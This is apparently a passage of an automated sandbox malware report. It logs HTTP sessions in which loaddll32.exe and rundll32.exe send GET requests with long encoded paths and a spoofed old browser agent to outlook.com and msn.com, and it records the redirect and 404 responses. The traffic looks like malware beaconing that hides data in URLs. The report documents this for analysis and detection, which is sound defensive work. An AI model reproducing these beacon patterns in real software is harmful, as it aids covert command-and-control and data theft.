                                                                                                                        2021-10-11 22:40:08 UTC15OUTGET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: www.outlook.com
                                                                                                                        2021-10-11 22:40:08 UTC15INHTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://outlook.office365.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 6f503dd6-681b-92e6-0e33-05fdd79ea39d
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: AS9PR0301CA0009
                                                                                                                        X-RequestId: 5f53b19c-6d27-4c9c-b051-e6d331879eab
                                                                                                                        MS-CV: 1j1Qbxto5pIOMwX9156jnQ.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AS9PR0301CA0009
                                                                                                                        Date: Mon, 11 Oct 2021 22:40:08 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        12192.168.2.44986240.101.124.226443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:40:08 UTC16OUTGET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.office365.com
                                                                                                                        2021-10-11 22:40:08 UTC16INHTTP/1.1 404 Not Found
                                                                                                                        Content-Length: 1245
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: bd6df30b-3506-0654-39aa-09111fc341ce
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Alt-Svc: h3=":443",h3-29=":443"
                                                                                                                        X-CalculatedFETarget: VI1PR07CU008.internal.outlook.com
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-FEProxyInfo: VI1PR07CA0252.EURPRD07.PROD.OUTLOOK.COM
                                                                                                                        X-CalculatedBETarget: VI1PR01MB6621.EURPRD01.PROD.EXCHANGELABS.COM
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-RUM-Validated: 1
                                                                                                                        X-Proxy-RoutingCorrectness: 1
                                                                                                                        X-Proxy-BackendServerStatus: 404
                                                                                                                        MS-CV: C/NtvQY1VAY5qgkRH8NBzg.1.1
                                                                                                                        X-FEServer: VI1PR07CA0252
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AM5PR0101CA0012
                                                                                                                        Date: Mon, 11 Oct 2021 22:40:08 GMT
                                                                                                                        Connection: close
                                                                                                                        2021-10-11 22:40:08 UTC17INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        2192.168.2.44980640.97.116.82443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:46 UTC2OUTGET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.com
                                                                                                                        2021-10-11 22:38:46 UTC2INHTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://www.outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: d3c10e4c-5e49-3a6f-0bca-0aa8eeb05a44
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: MWHPR13CA0010
                                                                                                                        X-RequestId: dd82cfc2-7512-45b0-82e8-afbaf83fa8be
                                                                                                                        MS-CV: TA7B00lebzoLygqo7rBaRA.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: MWHPR13CA0010
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:46 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        3192.168.2.44980752.97.183.162443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:46 UTC3OUTGET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: www.outlook.com
                                                                                                                        2021-10-11 22:38:46 UTC4INHTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://outlook.office365.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 4827db24-f7db-9519-6b3d-e535d1121fb8
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: AM7PR03CA0018
                                                                                                                        X-RequestId: f1bbbeb9-c424-4847-91c0-206d8d6abcc1
                                                                                                                        MS-CV: JNsnSNv3GZVrPeU10RIfuA.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AM7PR03CA0018
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:46 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        4192.168.2.44980852.97.218.82443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:46 UTC4OUTGET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.office365.com
                                                                                                                        2021-10-11 22:38:46 UTC5INHTTP/1.1 404 Not Found
                                                                                                                        Content-Length: 1245
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: fee0e76a-0690-24c5-d39f-a0f3ac107e50
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-CalculatedFETarget: VI1PR0102CU003.internal.outlook.com
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-FEProxyInfo: VI1PR0102CA0087.EURPRD01.PROD.EXCHANGELABS.COM
                                                                                                                        X-CalculatedBETarget: VI1PR04MB4495.eurprd04.prod.outlook.com
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-RUM-Validated: 1
                                                                                                                        X-Proxy-RoutingCorrectness: 1
                                                                                                                        X-Proxy-BackendServerStatus: 404
                                                                                                                        MS-CV: aufg/pAGxSTTn6DzrBB+UA.1.1
                                                                                                                        X-FEServer: VI1PR0102CA0087
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AS8PR04CA0081
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:46 GMT
                                                                                                                        Connection: close
                                                                                                                        2021-10-11 22:38:46 UTC5INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        5192.168.2.44980940.97.153.146443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:53 UTC7OUTGET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.com
                                                                                                                        2021-10-11 22:38:53 UTC7INHTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://www.outlook.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 556c818d-51ec-ad8d-c23c-618ef38fd56c
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: BN6PR2001CA0003
                                                                                                                        X-RequestId: d6343e44-52af-49e0-aabf-9bf1bd538048
                                                                                                                        MS-CV: jYFsVexRja3CPGGO84/VbA.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: BN6PR2001CA0003
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:52 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        6192.168.2.44981052.97.218.66443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:53 UTC8OUTGET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: www.outlook.com
                                                                                                                        2021-10-11 22:38:53 UTC8INHTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://outlook.office365.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: fa41d79f-b084-e275-06fd-7c804baa2baf
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: AS8PR04CA0017
                                                                                                                        X-RequestId: 5790813c-b01e-46a4-ac89-6c67c15fc018
                                                                                                                        MS-CV: n9dB+oSwdeIG/XyAS6orrw.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AS8PR04CA0017
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:52 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        7192.168.2.44981152.97.137.210443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:53 UTC9OUTGET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.office365.com
                                                                                                                        2021-10-11 22:38:53 UTC9INHTTP/1.1 404 Not Found
                                                                                                                        Content-Length: 1245
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 463ae588-6705-a5a4-dc70-c20dde540b89
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-CalculatedFETarget: HE1PR0202CU001.internal.outlook.com
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-FEProxyInfo: HE1PR0202CA0016.EURPRD02.PROD.OUTLOOK.COM
                                                                                                                        X-CalculatedBETarget: HE1P194MB0201.EURP194.PROD.OUTLOOK.COM
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-RUM-Validated: 1
                                                                                                                        X-Proxy-RoutingCorrectness: 1
                                                                                                                        X-Proxy-BackendServerStatus: 404
                                                                                                                        MS-CV: iOU6RgVnpKXccMIN3lQLiQ.1.1
                                                                                                                        X-FEServer: HE1PR0202CA0016
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AM6P194CA0062
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:53 GMT
                                                                                                                        Connection: close
                                                                                                                        2021-10-11 22:38:53 UTC10INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        8192.168.2.44982713.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:39:27 UTC11OUTGET /mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: msn.com
                                                                                                                        2021-10-11 22:39:27 UTC12INHTTP/1.1 301 Moved Permanently
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Location: https://www.msn.com/mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jre
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Date: Mon, 11 Oct 2021 22:39:26 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 380
                                                                                                                        2021-10-11 22:39:27 UTC12INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 35 68 48 64 4f 68 36 61 56 47 49 69 4e 2f 78 6d 33 76 37 5f 32 42 2f 45 6b 53 68 75 6e 68 7a 41 6f 37 4d 73 5a 39 43 6d 6b 71 46 57 74 58 2f 33 7a 5f 32 42 6e 73 34 4f 4e 2f 39 31 43 57 4d 73 5a 6b 68 39 4b 30 4c 5f 32 46 4b 2f 44 47 57 42 74 53 45 77 61 6a 45 4a 2f 30 54 74 70 52 45 62 75 64 64 35 2f 51 67 4a 4b 31 30 32 4e 32 54 39 6a 34 38 2f
                                                                                                                        Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        9192.168.2.44982913.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:39:34 UTC12OUTGET /mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6wDOp8ES889SSlI1S/AFbHRrWLn/_2F7R_2FVhgDELEonTCy/KSLPzpnW0YF_2FoB4Xy/kHR_2F88KI6KqxU9hJvbKE/it_2FLM35/c.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: msn.com
                                                                                                                        2021-10-11 22:39:34 UTC13INHTTP/1.1 301 Moved Permanently
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Location: https://www.msn.com/mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6wDOp8ES889SSlI1S/AFbHRrWLn/_2F7R_2FVhgDELEonTCy/KSLPzpnW0YF_2FoB4Xy/kHR_2F88KI6KqxU9hJvbKE/it_2FLM35/c.jre
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Date: Mon, 11 Oct 2021 22:39:33 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 377
                                                                                                                        2021-10-11 22:39:34 UTC13INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 51 6f 65 45 77 37 7a 6e 4e 59 39 4b 75 5a 4c 50 76 2f 50 68 6c 44 76 41 46 67 30 42 6e 6e 2f 6e 56 78 36 44 6e 54 79 6e 4a 53 2f 4a 71 65 32 41 4f 6a 52 44 38 76 59 4a 73 2f 50 75 71 42 4c 49 6e 33 5a 64 33 37 4f 58 79 4a 6c 77 44 37 51 2f 46 69 4c 68 6a 4b 6e 56 57 5f 32 42 79 73 77 58 2f 4c 58 70 68 46 6f 73 52 59 74 52 45 5a 4f 4c 2f 51 36 77
                                                                                                                        Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6w


                                                                                                                        Code Manipulations

                                                                                                                        Statistics

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Start time:00:36:03
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\System32\loaddll32.exe
